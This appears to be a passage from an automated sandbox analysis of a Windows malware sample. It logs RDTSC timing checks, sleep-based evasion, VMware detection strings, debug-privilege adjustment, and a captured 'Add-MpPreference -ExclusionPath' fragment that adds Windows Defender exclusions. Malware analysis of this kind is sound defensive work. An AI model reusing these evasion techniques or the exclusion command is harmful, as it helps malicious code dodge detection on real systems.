          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002DC8604 second address: 0000000002DC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002DC899E second address: 0000000002DC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -9223372036854770s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556Thread sleep count: 1934 > 30Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239875s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556Thread sleep count: 1406 > 30Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 7164Thread sleep time: -36459s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239747s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239639s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239530s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239422s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239296s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239187s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239047s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238919s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238796s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238672s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238452s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238157s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237359s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237246s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237139s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237031s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -236844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -236344s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -236109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -235797s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -235468s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -235355s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3200Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 4624Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004088D0 rdtsc 2_2_004088D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239875Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239747Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239639Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239530Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239422Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239296Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239187Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239047Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238919Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238796Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238672Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238562Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238452Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238157Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237500Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237359Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237246Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237139Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237031Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236844Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236344Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236109Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235797Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235468Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235355Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeWindow / User API: threadDelayed 1934Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeWindow / User API: threadDelayed 1406Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239875Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 36459Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239747Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239639Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239530Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239422Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239296Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239187Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239047Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238919Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238796Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238672Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238562Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238452Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238157Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237500Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237359Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237246Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237139Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237031Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236844Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236344Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236109Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235797Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235468Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235355Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmpBinary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}||w)
          Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.407240995.000000000D614000.00000004.00000001.sdmpBinary or memory string: dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$w
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004088D0 rdtsc 2_2_004088D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE58EC mov eax, dword ptr fs:[00000030h]2_2_00FE58EC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov eax, dword ptr fs:[00000030h]2_2_01004120
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov eax, dword ptr fs:[00000030h]2_2_01004120
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov eax, dword ptr fs:[00000030h]2_2_01004120
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov eax, dword ptr fs:[00000030h]2_2_01004120
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov ecx, dword ptr fs:[00000030h]2_2_01004120
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101513A mov eax, dword ptr fs:[00000030h]2_2_0101513A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101513A mov eax, dword ptr fs:[00000030h]2_2_0101513A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100B944 mov eax, dword ptr fs:[00000030h]2_2_0100B944
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100B944 mov eax, dword ptr fs:[00000030h]2_2_0100B944
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9080 mov eax, dword ptr fs:[00000030h]2_2_00FE9080
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100C182 mov eax, dword ptr fs:[00000030h]2_2_0100C182
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A185 mov eax, dword ptr fs:[00000030h]2_2_0101A185
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012990 mov eax, dword ptr fs:[00000030h]2_2_01012990
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010669A6 mov eax, dword ptr fs:[00000030h]2_2_010669A6
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010161A0 mov eax, dword ptr fs:[00000030h]2_2_010161A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010161A0 mov eax, dword ptr fs:[00000030h]2_2_010161A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010651BE mov eax, dword ptr fs:[00000030h]2_2_010651BE
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010651BE mov eax, dword ptr fs:[00000030h]2_2_010651BE
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010651BE mov eax, dword ptr fs:[00000030h]2_2_010651BE
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010651BE mov eax, dword ptr fs:[00000030h]2_2_010651BE
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h]2_2_00FFB02A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h]2_2_00FFB02A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h]2_2_00FFB02A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h]2_2_00FFB02A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010741E8 mov eax, dword ptr fs:[00000030h]2_2_010741E8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067016 mov eax, dword ptr fs:[00000030h]2_2_01067016
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067016 mov eax, dword ptr fs:[00000030h]2_2_01067016
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067016 mov eax, dword ptr fs:[00000030h]2_2_01067016
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B4015 mov eax, dword ptr fs:[00000030h]2_2_010B4015
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B4015 mov eax, dword ptr fs:[00000030h]2_2_010B4015
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]2_2_00FEB1E1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]2_2_00FEB1E1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]2_2_00FEB1E1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]2_2_0101002D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]2_2_0101002D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]2_2_0101002D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]2_2_0101002D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]2_2_0101002D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01000050 mov eax, dword ptr fs:[00000030h]2_2_01000050
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01000050 mov eax, dword ptr fs:[00000030h]2_2_01000050
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A2073 mov eax, dword ptr fs:[00000030h]2_2_010A2073
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B1074 mov eax, dword ptr fs:[00000030h]2_2_010B1074
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01063884 mov eax, dword ptr fs:[00000030h]2_2_01063884
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01063884 mov eax, dword ptr fs:[00000030h]2_2_01063884
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB171 mov eax, dword ptr fs:[00000030h]2_2_00FEB171
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB171 mov eax, dword ptr fs:[00000030h]2_2_00FEB171
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC962 mov eax, dword ptr fs:[00000030h]2_2_00FEC962
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]2_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]2_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]2_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]2_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]2_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]2_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010290AF mov eax, dword ptr fs:[00000030h]2_2_010290AF
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101F0BF mov ecx, dword ptr fs:[00000030h]2_2_0101F0BF
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101F0BF mov eax, dword ptr fs:[00000030h]2_2_0101F0BF
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101F0BF mov eax, dword ptr fs:[00000030h]2_2_0101F0BF
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]2_2_0107B8D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov ecx, dword ptr fs:[00000030h]2_2_0107B8D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]2_2_0107B8D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]2_2_0107B8D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]2_2_0107B8D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]2_2_0107B8D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h]2_2_00FE9100
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h]2_2_00FE9100
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h]2_2_00FE9100
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A131B mov eax, dword ptr fs:[00000030h]2_2_010A131B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]2_2_00FFAAB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]2_2_00FFAAB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8B58 mov eax, dword ptr fs:[00000030h]2_2_010B8B58
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]2_2_00FE52A5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]2_2_00FE52A5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]2_2_00FE52A5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]2_2_00FE52A5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]2_2_00FE52A5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01013B7A mov eax, dword ptr fs:[00000030h]2_2_01013B7A
